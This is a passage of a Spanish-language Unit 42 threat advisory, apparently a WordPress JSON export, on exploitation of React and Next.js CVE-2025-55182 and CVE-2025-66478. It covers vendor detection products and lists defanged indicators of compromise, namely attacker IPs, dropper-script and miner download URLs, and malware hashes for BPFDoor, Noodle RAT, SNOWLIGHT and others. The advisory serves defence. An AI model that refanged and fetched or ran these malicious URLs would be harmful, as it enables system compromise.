vulnerabilidades<\/li>\n<li>B\u00fasqueda (hunting) de indicadores maliciosos v\u00eda una consulta XQL<\/li>\n<li>Aislamiento de servidores React y Next.js comprometidos (requiere aprobaci\u00f3n del analista)<\/li>\n<li>Bloqueo de indicadores maliciosos<\/li>\n<li>Provisi\u00f3n de recomendaciones de mitigaci\u00f3n<\/li>\n<\/ul>\n<h3><a id=\"post-167647-_j81w8qavwcm6\"><\/a><strong>Cortex Xpanse<\/strong><\/h3>\n<p><a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XPANSE\" target=\"_blank\" rel=\"noopener\">Cortex Xpanse<\/a> est\u00e1 dise\u00f1ado para identificar dispositivos y aplicaciones expuestos en la internet p\u00fablica y escalar estos hallazgos a los defensores. Los clientes pueden habilitar alertas sobre activos que est\u00e1n potencialmente en riesgo asegurando que la Regla de Superficie de Ataque de Vercel Next.js est\u00e9 habilitada.<\/p>\n<p>Adicionalmente, Xpanse ha publicado una prueba de superficie de ataque para la CVE-2025-55182. Esto valida la vulnerabilidad mediante una verificaci\u00f3n directa de RCE, al intentar ejecutar un payload de comando benigno compatible tanto con sistemas Linux como Windows.<\/p>\n<p>Notablemente, estas aplicaciones React y Next.js no exponen p\u00fablicamente detalles de la versi\u00f3n del software, lo que significa que estas detecciones no son un indicador fuerte de una aplicaci\u00f3n vulnerable. Estas detecciones tambi\u00e9n est\u00e1n disponibles para clientes de Cortex XSIAM que hayan comprado el m\u00f3dulo ASM.<\/p>\n<h3><a id=\"post-167647-_mu2u0hl0lryd\"><\/a><strong>Cortex Cloud<\/strong><\/h3>\n<p><a href=\"https:\/\/www.google.com\/search?q=https:\/\/docs-cortex.paloaltonetworks.com\/p\/Cortex%2BCLOUD\">Cortex Cloud<\/a> proporciona capacidades integrales de ASPM para identificar r\u00e1pidamente el alcance de CVE-2025-55182 y CVE-2025-66478 a trav\u00e9s de su panorama de aplicaciones. A trav\u00e9s de visibilidad SBOM en tiempo real, los equipos de seguridad pueden consultar instant\u00e1neamente su inventario de software para localizar instancias espec\u00edficas de paquetes vulnerables de React (versiones 19.0\u201319.2) y Next.js (versiones 15.x\u201316.x). El modelo de Riesgo Operativo de la plataforma ayuda a\u00fan m\u00e1s en la priorizaci\u00f3n evaluando la salud de los componentes y los riesgos marcados. Crucialmente, los equipos pueden imponer barreras de prevenci\u00f3n primero (prevention-first guardrails) para bloquear autom\u00e1ticamente builds que contengan estas vulnerabilidades cr\u00edticas. Esto asegura que ninguna aplicaci\u00f3n que dependa de la implementaci\u00f3n no sancionada o no parcheada del protocolo Flight pueda ser desplegada jam\u00e1s, deteniendo efectivamente el vector de RCE antes de que entre en su entorno.<\/p>\n<h3><a id=\"post-167647-_ypf8a5owwpoy\"><\/a><strong>Prisma Cloud<\/strong><\/h3>\n<p><a href=\"https:\/\/www.paloaltonetworks.com\/prisma\/cloud\" target=\"_blank\" rel=\"noopener\">Prisma Cloud<\/a> detecta la presencia de estas vulnerabilidades cr\u00edticas dentro de su base de c\u00f3digo, registros y entornos de ejecuci\u00f3n. El esc\u00e1ner de vulnerabilidades de la plataforma identifica espec\u00edficamente el uso de los paquetes afectados react-server y next asociados con CVE-2025-55182 y CVE-2025-66478. M\u00e1s all\u00e1 de la detecci\u00f3n, puede configurar reglas de cumplimiento para bloquear activamente builds y despliegues si se detectan estos hallazgos de alta severidad. Al mostrar estos riesgos e imponer un umbral de fallo para CVEs cr\u00edticos, Prisma Cloud permite a los equipos prevenir el lanzamiento de aplicaciones que ejecutan versiones susceptibles, asegurando que solo los frameworks reforzados y parcheados lleguen a producci\u00f3n.<\/p>\n<h2><a id=\"post-167647-_w7cnu83h0tmj\"><\/a>Indicadores de Compromiso (IoC)<\/h2>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">140[.]99[.]223[.]178\u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">156[.]234[.]209[.]103<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">38[.]162[.]112[.]141<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">45[.]32[.]158[.]54<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">46[.]36[.]37[.]85<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">47[.]84[.]79[.]46<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">95[.]169[.]180[.]135<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">45.134.174[.]235\/2.sh<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">45.134.174[.]235\/solra<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/46[.]36[.]37[.]85:12000\/sex[.]sh<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/115[.]42[.]60[.]223:61236\/slt<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/45[.]32[.]158[.]54\/5e51aff54626ef7f\/x86_64<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/115[.]42[.]60[.]223:61236\/slt<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/156[.]234[.]209[.]103:20912\/get[.]sh<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/156[.]234[.]209[.]103:20913\/get[.]sh<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/45[.]32[.]158[.]54\/5e51aff54626ef7f\/x86_64<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/46[.]36[.]37[.]85:12000\/sex[.]sh<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/95[.]169[.]180[.]135:8443\/pamssod<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/res[.]qiqigece[.]top\/nginx1<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxps:\/\/raw[.]githubusercontent[.]com\/C3Pool\/xmrig_setup\/master\/setup_c3pool_miner[.]sh<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxps:\/\/sup001[.]oss-cn-hongkong[.]aliyuncs[.]com\/123\/python1[.]sh<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">reactcdn[.]windowserrorapis[.]com<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">res[.]qiqigece[.]top<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">ebdb85704b2e7ced3673b12c6f3687bc0177a7b1b3caef110213cc93a75da837<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">f88ce150345787dd1bcfbc301350033404e32273c9a140f22da80810e3a3f6ea<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">fc9e53675e315edeea2292069c3fbc91337c972c936ca0f535da01760814b125<\/span><\/li>\n<\/ul>\n<h3><a id=\"post-167647-_xj818cb9mihp\"><\/a><strong>BPFDoor<\/strong><\/h3>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">140.99.223[.]178\/32736<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">1f3f0695c7ec63723b2b8e9d50b1838df304821fcb22c7902db1f8248a812035<\/span><\/li>\n<\/ul>\n<h3><a id=\"post-167647-_e33yc88ehype\"><\/a><strong>EtherRAT<\/strong><\/h3>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/193.24.123[.]68:3001\/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh<\/span><\/li>\n<\/ul>\n<h3><a id=\"post-167647-_cbfvbxd2auwo\"><\/a><strong>Noodle RAT<\/strong><\/h3>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">192.238.202[.]17<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">tcp:\/\/vip[.]kof97.lol:443<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/146.88.129[.]138:5511\/443nb64<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">33641bfbbdd5a9cd2320c61f65fe446a2226d8a48e3bd3c29e8f916f0592575f<\/span><\/li>\n<\/ul>\n<p><strong>SNOWLIGHT<\/strong><\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">115[.]42[.]60[.]223<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">a455731133c00fdd2a141bdfba4def34ae58195126f762cdf951056b0ef161d4<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">1663d98c259001f1b03f82d0c5bee7cfd3c7623ccb83759c994f9ab845939665<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">18c68a982f91f665effe769f663c51cb0567ea2bfc7fab6a1a40d4fe50fc382b<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">1a3e7b4ee2b2858dbac2d73dd1c52b1ea1d69c6ebb24cc434d1e15e43325b74e<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">1cdd9b0434eb5b06173c7516f99a832dc4614ac10dda171c8eed3272a5e63d20<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">1e31dc074a4ea7f400cb969ea80e8855b5e7486660aab415da17591bc284ac5b<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">2b0dc27f035ba1417990a21dafb361e083e4ed94a75a1c49dc45690ecf463de4<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">2ca913556efd6c45109fd8358edb18d22a10fb6a36c1ab7b2df7594cd5b0adbc<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">4ff096fbea443778fec6f960bf2b9c84da121e6d63e189aebaaa6397d9aac948<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">55ae00bc8482afd085fd128965b108cca4adb5a3a8a0ee2957d76f33edd5a864<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">62e9a01307bcf85cdaeecafd6efb5be72a622c43a10f06d6d6d3b566b072228d<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">7d25a97be42b357adcc6d7f56ab01111378a3190134aa788b1f04336eb924b53<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">7f05bad031d22c2bb4352bf0b6b9ee2ca064a4c0e11a317e6fedc694de37737a<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">9c931f7f7d511108263b0a75f7b9fcbbf9fd67ebcc7cd2e5dcd1266b75053624<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">ac2182dfbf56d58b4d63cde3ad6e7a52fed54e52959e4c82d6fc999f20f8d693<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">ac7027f30514d0c00d9e8b379b5ad8150c9827c827dc7ee54d906fc2585b6bf6<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">b38ec4c803a2d84277d9c598bfa5434fb8561ddad0ec38da6f9b8ece8104d787<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">bc31561c44a36e1305692d0af673bc5406f4a5bb2c3f2ffdb613c09b4e80fa9f<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">bf602b11d99e815e26c88a3a47eb63997d43db8b8c60db06d6fbddf386fd8c4a<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">d704541cde64a3eef5c4f80d0d7f96dc96bae8083804c930111024b274557b16<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">d9313f949af339ed9fafb12374600e66b870961eeb9b2b0d4a3172fd1aa34ed0<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">e2d7c8491436411474cef5d3b51116ddecfee68bab1e15081752a54772559879<\/span><\/li>\n<\/ul>\n<p><strong>VSHell<\/strong><\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">4a759cbc219bcb3a1f8380a959307b39873fb36a9afd0d57ba0736ad7a02763b<\/span><\/li>\n<\/ul>\n<h2><a id=\"post-167647-_17jrv5hkmluz\"><\/a>Recursos Adicionales<\/h2>\n<ul>\n<li><a href=\"https:\/\/www.sysdig.com\/blog\/unc5174-chinese-threat-actor-vshell\" target=\"_blank\" rel=\"noopener\">La evoluci\u00f3n de UNC5174 en la guerra cibern\u00e9tica en curso de China: De SNOWLIGHT a VShell<\/a> \u2013 Blog, Sysdig<\/li>\n<li><a href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/initial-access-brokers-exploit-f5-screenconnect\" target=\"_blank\" rel=\"noopener\">Trayendo el Acceso de Vuelta \u2014 Brokers de Acceso Inicial Explotan F5 BIG-IP (CVE-2023-46747) y ScreenConnect<\/a> \u2013 Google Cloud Blog<\/li>\n<li><a href=\"https:\/\/hivepro.com\/threat-advisory\/unc5174-functions-as-an-initial-access-broker-exploiting-vulnerabilities\/\" target=\"_blank\" rel=\"noopener\">UNC5174 Funciona como un Broker de Acceso Inicial, Explotando Vulnerabilidades<\/a> \u2013 Reporte de Vulnerabilidad de Hive Pro<\/li>\n<\/ul>\n<p><em>Actualizado a las 3:45 p.m. PT para a\u00f1adir actualizaciones significativas. Estas incluyen una secci\u00f3n de Actividad de Post-Explotaci\u00f3n y cobertura de productos. La nueva actividad cubre: escaneo y reconocimiento, robo de credenciales en la nube, scripts dropper maliciosos, criptominer\u00eda, despliegue del backdoor NOODLERAT, ejecuci\u00f3n de SNOWLIGHT y VShell y actividad vinculada a China.<\/em><\/p>\n<p><em>Actualizado el 9 de dic., 2025, a las 2:00 p.m. PT para a\u00f1adir actualizaciones significativas. Estas incluyen detalles adicionales en la secci\u00f3n de Actividad de Post-Explotaci\u00f3n. Las nuevas subsecciones incluyen informaci\u00f3n sobre: Actividad que comparte superposiciones con herramientas de la DPRK usando EtherRAT; BPFDoor, un backdoor de Linux; y una nueva variante de Auto-color (un backdoor de Linux). Se actualiz\u00f3 la secci\u00f3n de Indicadores de Compromiso. Se a\u00f1adi\u00f3 una nueva firma de Threat Prevention.<\/em><\/p>\n<p><em>Actualizado el 10 de diciembre de 2025 a la 1:30 p. m. PT para agregar una subsecci\u00f3n sobre los intentos de explotaci\u00f3n de React2Shell en la secci\u00f3n de Actividad de Post-Explotaci\u00f3n. Se agreg\u00f3 informaci\u00f3n y cobertura de los playbooks de Cortex XDR.<\/em><\/p>\n<p><em>Actualizado el 11 de diciembre de 2025 a la 1:30 p. m. PT para agregar un script a la subsecci\u00f3n sobre los intentos de explotaci\u00f3n de React2Shell en la secci\u00f3n de Actividad de post-explotaci\u00f3n. Se modific\u00f3 la redacci\u00f3n de Cortex Xpanse.<\/em><\/p>\n<p><i><span style=\"font-weight: 400;\">Actualizado el 12 de dic. de 2025, a la 1:40 p.m. PT para cambiar el lenguaje en torno a la atribuci\u00f3n de CL-STA-1015, y actualizar el nombre de BPFDoor a KSwapDoor con detalles adicionales.<\/span><\/i><\/p>\n<p><i><span style=\"font-weight: 400;\">Actualizado el 15 de dic. de 2025, a las 2:00 p.m. PT para agregar una actualizaci\u00f3n sobre KSwapDoor a la secci\u00f3n de Resumen Ejecutivo. Se realizaron peque\u00f1os cambios para mayor claridad.<\/span><\/i><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Analizamos la vulnerabilidad de RCE con calificaci\u00f3n CVSS 10.0 en el protocolo Flight utilizado por React Server Components. Se rastrea como CVE-2025-55182.<\/p>\n","protected":false},"author":23,"featured_media":167630,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[8775,8856],"tags":[9935,9821,9822,9464,9532],"product_categories":[8923,8921,8928,8932,8933,8934,8937,8935,8938,8929,8890],"coauthors":[1025],"class_list":["post-167647","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-top-cyberthreats-es-la","category-vulnerabilities-es-la","tag-cobalt-strike","tag-cve-2025-55182-es-la","tag-cve-2025-66478-es-la","tag-remote-code-execution-es-la","tag-web-shells-es-la","product_categories-advanced-threat-prevention-es-la","product_categories-cloud-delivered-security-services-es-la","product_categories-code-to-cloud-platform-es-la","product_categories-cortex-es-la","product_categories-cortex-cloud-es-la","product_categories-cortex-xdr-es-la","product_categories-cortex-xpanse-es-la","product_categories-cortex-xsiam-es-la","product_categories-next-generation-firewall-es-la","product_categories-prisma-cloud-es-la","product_categories-unit-42-incident-response-es-la"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Explotaci\u00f3n de Vulnerabilidad Cr\u00edtica en React Server Components (Actualizado el 12 de diciembre)<\/title>\n<meta name=\"description\" content=\"Analizamos la vulnerabilidad de RCE con calificaci\u00f3n CVSS 10.0 en el protocolo Flight utilizado por React Server Components. Se rastrea como CVE-2025-55182.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/es-la\/cve-2025-55182-react-and-cve-2025-66478-next\/\" \/>\n<meta property=\"og:locale\" content=\"es_LA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Explotaci\u00f3n de Vulnerabilidad Cr\u00edtica en React Server Components (Actualizado el 12 de diciembre)\" \/>\n<meta property=\"og:description\" content=\"Analizamos la vulnerabilidad de RCE con calificaci\u00f3n CVSS 10.0 en el protocolo Flight utilizado por React Server Components. Se rastrea como CVE-2025-55182.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/es-la\/cve-2025-55182-react-and-cve-2025-66478-next\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-12T17:40:44+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-12-16T15:40:24+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/02_Vulnerabilities_1920x900.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Unit 42\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Explotaci\u00f3n de Vulnerabilidad Cr\u00edtica en React Server Components (Actualizado el 12 de diciembre)","description":"Analizamos la vulnerabilidad de RCE con calificaci\u00f3n CVSS 10.0 en el protocolo Flight utilizado por React Server Components. Se rastrea como CVE-2025-55182.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/es-la\/cve-2025-55182-react-and-cve-2025-66478-next\/","og_locale":"es_LA","og_type":"article","og_title":"Explotaci\u00f3n de Vulnerabilidad Cr\u00edtica en React Server Components (Actualizado el 12 de diciembre)","og_description":"Analizamos la vulnerabilidad de RCE con calificaci\u00f3n CVSS 10.0 en el protocolo Flight utilizado por React Server Components. Se rastrea como CVE-2025-55182.","og_url":"https:\/\/unit42.paloaltonetworks.com\/es-la\/cve-2025-55182-react-and-cve-2025-66478-next\/","og_site_name":"Unit 42","article_published_time":"2025-12-12T17:40:44+00:00","article_modified_time":"2025-12-16T15:40:24+00:00","og_image":[{"width":1920,"height":900,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/02_Vulnerabilities_1920x900.jpg","type":"image\/jpeg"}],"author":"Unit 42","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/cve-2025-55182-react-and-cve-2025-66478-next\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/cve-2025-55182-react-and-cve-2025-66478-next\/"},"author":{"name":"Unit 42","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/a891f81d18648a1e0bab742238d31a63"},"headline":"Explotaci\u00f3n de Vulnerabilidad Cr\u00edtica en React Server Components (Actualizado el 12 de diciembre)","datePublished":"2025-12-12T17:40:44+00:00","dateModified":"2025-12-16T15:40:24+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/cve-2025-55182-react-and-cve-2025-66478-next\/"},"wordCount":5205,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/cve-2025-55182-react-and-cve-2025-66478-next\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/02_Vulnerabilities_1920x900.jpg","keywords":["Cobalt Strike","CVE-2025-55182","CVE-2025-66478","Remote Code Execution","web shells"],"articleSection":["Amenazas sofisticadas","Vulnerabilidades"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/cve-2025-55182-react-and-cve-2025-66478-next\/","url":"https:\/\/unit42.paloaltonetworks.com\/es-la\/cve-2025-55182-react-and-cve-2025-66478-next\/","name":"Explotaci\u00f3n de Vulnerabilidad Cr\u00edtica en React Server Components (Actualizado el 12 de diciembre)","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/cve-2025-55182-react-and-cve-2025-66478-next\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/cve-2025-55182-react-and-cve-2025-66478-next\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/02_Vulnerabilities_1920x900.jpg","datePublished":"2025-12-12T17:40:44+00:00","dateModified":"2025-12-16T15:40:24+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/a891f81d18648a1e0bab742238d31a63"},"description":"Analizamos la vulnerabilidad de RCE con calificaci\u00f3n CVSS 10.0 en el protocolo Flight utilizado por React Server Components. Se rastrea como CVE-2025-55182.","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/cve-2025-55182-react-and-cve-2025-66478-next\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/es-la\/cve-2025-55182-react-and-cve-2025-66478-next\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/cve-2025-55182-react-and-cve-2025-66478-next\/#primaryimage","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/02_Vulnerabilities_1920x900.jpg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/02_Vulnerabilities_1920x900.jpg","width":1920,"height":900,"caption":"Pictorial representation of CVE-2025-55182 (React) and CVE-2025-66478 (Next.js). Close-up of a digital display on electronic equipment with illuminated text reading \"SYSTEM HACKED\" in red, set against a blurred background of blue and red lights."},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/cve-2025-55182-react-and-cve-2025-66478-next\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/"},{"@type":"ListItem","position":2,"name":"Explotaci\u00f3n de Vulnerabilidad Cr\u00edtica en React Server Components (Actualizado el 12 de diciembre)"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/a891f81d18648a1e0bab742238d31a63","name":"Unit 42","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/5b5a1c33b73a577ebaf42f25081b0ebd","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/Insights_headshot-placeholder-300x300.jpg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/Insights_headshot-placeholder-300x300.jpg","caption":"Unit 42"},"url":"https:\/\/origin-unit42.paloaltonetworks.com\/es-la\/author\/unit42\/"}]}},"_links":{"self":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/posts\/167647","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/users\/23"}],"replies":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/comments?post=167647"}],"version-history":[{"count":4,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/posts\/167647\/revisions"}],"predecessor-version":[{"id":168582,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/posts\/167647\/revisions\/168582"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/media\/167630"}],"wp:attachment":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/media?parent=167647"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/categories?post=167647"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/tags?post=167647"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/product_categories?post=167647"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/coauthors?post=167647"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}